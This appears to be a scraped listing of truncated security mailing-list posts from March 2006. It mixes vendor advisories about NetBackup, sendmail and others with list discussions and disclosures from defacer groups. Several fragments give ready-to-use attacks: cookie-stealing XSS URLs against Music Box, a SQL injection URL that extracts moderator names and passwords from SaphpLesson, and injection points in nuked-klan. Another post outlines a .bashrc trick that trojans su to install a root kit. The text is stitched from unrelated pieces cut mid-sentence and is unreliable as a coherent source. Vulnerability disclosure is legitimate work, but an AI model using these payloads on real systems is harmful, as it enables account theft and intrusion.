[W]orld [D]efacers Team
==
Summary
eVuln ID: WD00
Vendor: phplivehelper
Vendor's Web Site: www.phplivehelper.com
Software: Live Customer Support Solution
Software's Web Site:
http://www.turnkeywebtools.com/index.php/location/pr
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
3Com/TippingPoint identified multiple buffer overflow vulnerabilities in
daemons running on Veritas NetBackup Master, Media Servers and clients.
See
http://securityresponse.symantec.com/avcenter/security/Content/2006.03.37.html
for full advisory con
ZDI-06-005: Symantec VERITAS NetBackup Volume Manager Buffer Overflow
http://www.zerodayinitiative.com/advisories/ZDI-06-005.html
March 27, 2006
-- CVE ID:
CVE-2006-0989
-- Affected Vendor:
Symantec VERITAS
-- Affected Products:
VERITAS NetBackup v6.0
-- TippingPoint(TM) IPS Customer Protection
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1020-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
March 28th, 2006
ZDI-06-006: Symantec VERITAS NetBackup Database Manager Buffer Overflow
http://www.zerodayinitiative.com/advisories/ZDI-06-006.html
March 27, 2006
-- CVE ID:
CVE-2006-0990
-- Affected Vendor:
Symantec VERITAS
-- Affected Products:
VERITAS NetBackup v6.0
-- TippingPoint(TM) IPS Customer Protecti
TSRT-06-01: Symantec VERITAS NetBackup vnetd Buffer Overflow Vulnerability
http://www.tippingpoint.com/security/advisories/TSRT-06-01.html
March 27, 2006
-- CVE ID:
CVE-2006-0991
-- Affected Vendor:
Symantec VERITAS
-- Affected Products:
VERITAS NetBackup 6.0 Client
VERITAS NetBackup 6.0 Server
> Spoofing is indeed the attack vector and it can also be utilized for
> NTP, ICMP, etc. It is to blame.
>
> Still, DNS is what's being exploited and in my opinion a broken feature
> being exploited needs fixing, or it will be exploited.
What feature of DNS is being exploited, UDP or the fact tha
On Friday, March 24 at 07:05 PM, quoth Dave Korn:
Here is a simple hack to break sudo and su to get free root. Add
this to ~/.bashrc and fill in the following blanks:
* ~/.root_kit/rk_su
Your hacked su to give root on su --now-dammit
* ~/.root_kit/silent_install_root_kit
Your script to silent
* Theo de Raadt:
> What if we ignore your procedures? What if we say no?
You won't be told about bugs in the code you write. It's as simple as
that.
But I don't quite understand why Gadi is so thoroughly offended by the
way how this vulnerability has been handled so far. The patches might
be
I think the people complaining should look at their fears, it appears to me
that they are coming from a position of fear (lack of perceived control over
their systems, etc.) which is leading to anger and hatred that is being
directed outwards (at the closest target which to them is the people
a
On Mar 24, 2006, at 11:17 PM, Theo de Raadt wrote:
I did not decide that OpenSSH should become a critical part of the
internet, or that it should become a virtual monopoly. We made it
free. Again, the community decided to make it Internet
infrastructure.
Now you want to tell us that becau
Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com
Exploit :
XSS :
http://example.com/music/index.php?id='>alert(document.cookie)
http://example.com/music/index.php?action=top&show=5&type='>alert(document.cookie)
http://example.com/music/index.php?action=top&show='>alert(document.cookie)
-= DDSi Security Advisory =-
March 24, 2006
Vendor: Raindance Communications, Inc.
Raindance offers audio and web conferencing solutions for more
effective web meetings.
Integrated web, audio an
Windows XP firewall had improvements after SP2 and it displays alerts about
programs trying to listen on a port (acting as a 'server') to the users. It
doesn't display the path for the file nor the last extension, instead, it only
displays its description or name without the final extension.
if
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Chris Thompson wrote:
>Michael Sierchio <[EMAIL PROTECTED]> writes:
>
>>Robert Story wrote:
>>
>>>VG> In the scenario you describe, I cannot see any actual amplification...
>>>
>>>The amplification isn't in the number of hosts responding, but in
packe
Hi,
- As has been pointed out, this is a BETA release, so it's a bit, er, inelegant
to describe this as a flaw in 3.0. Guess I'll have to bump the release number
when we fix this...
- At least this is an implementation flaw, as opposed to the format design flaw
that the good folks at ElcomSoft
Microsoft MSN Hotmail : Cross-Site Scripting Vulnerability
//- Advisory
Program : Microsoft MSN Hotmail
Homepage : http://www.hotmail.com
Discovery: 2006/01/28
Author Contacted : 2006/03/21
Found by : crashfr at sysdream dot com
This Advisory: nono2357 a
[+]Blog Pixel Motion
[+]Software's Web Site:www.pixelmotion.org
[+]founded by Morocco Security Team
[+]creetz
to:SnIpEr_SA,Esp!onLeRaVaGe,CiM-TeaM,Kasparov,nabil,sniper,www.lezr.com and all
muslim [morocco]
[+]http://victim/blog/admin/index.php
[+]user:moroccan-security //you can write any name
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
New eVuln Advisory:
Maian Weblog Multiple SQL Injection Vulnerabilities
http://evuln.com/vulns/101/summary.html
Summary
eVuln ID: EV0101
CVE: CVE-2006-1334
Software: Maian Weblog
Software's Web Site: http://www.maianscriptworld.co.uk/
Versions: 2.0
Critical Leve
New eVuln Advisory:
DSLogin Authentication Bypass Vulnerability
http://evuln.com/vulns/100/summary.html
Summary
eVuln ID: EV0100
CVE: CVE-2006-1238
Software: DSLogin
Software's Web Site: http://dsportal.uw.hu/
Versions: 1.0
Critical Level: Moderate
Type: SQL Inj
--
HYSA-2006-007 h4cky0u.org Advisory 016
--
Date - Mon March 27 2006
TITLE:
==
phpmyfamily v1.4.1 CRLF injection & XSS
SEVERITY:
=
Medium
SOFTWARE:
=
phpmyfami
--
HYSA-2006-006 h4cky0u.org Advisory 015
--
Date - Mon March 27 2006
TITLE:
==
G-Book 1.0 XSS, Possible authentication bypass & mass message flood
SEVERITY:
=
High
SOFT
Cross Site Scripting Attack CanfTool v1.1
=
Description :
Conftool is a Web-based online system that was developed to support many
administrative tasks of conferences, workshops and seminars. It can help to
make the management of events easier and much
phpAdsNew / phpPgAds security advisory PHPADSNEW-SA-2006-001
Advisory ID: PHPADSNEW-SA-2006-001
Date: 2006-Mar-27
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
[+]nuked-klan
[+]www.nuked-klan.org
[+]founded By Moroccan Security Team
[+]special 10x to:CiM-TeaM,Esp!onLeRaVaGe,nabil,Dranzelz,SnIpEr_SA,www.lezr.com
[+]example
[+]http://[target]/index.php?file=Calendar&m=[sql]&y=2006
[+]have nice day
###
# Www.H4ckerz.coM --- Www.Hackerz.iR #
###
**
Vendor : VGM Forbin
Target Page : resource/products/adm/login.asp
Action : Turn back to default.asp
Exploit :
AkoComment is a well known and widely used add-on for the Mambo and
Joomla Content Management Systems. It allows users to post comments to
articles.
AkoComment 2.0 suffers from an SQL injection vulnerability
(components/com_akocomment/akocomment.php):
# Clear any HTML and SQL injections
$
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
HPSBUX02108 SSRT061133 rev.1 - HP-UX running Sendmail, Remote
Execution
of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted
upon as soon
as possible.
Release Date: 2006-03-25
Last Updated: 2006-03-25
Potential Sec
Hi
Vulnerable: SaphpLesson2.0
http://www.Arabless.com
Exploit :
http://Example.com/lesson/print.php?lessid=[SQL]
Example :
For Name & Password
http://Example.com/lesson/print.php?lessid=-1%20union%20select%20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,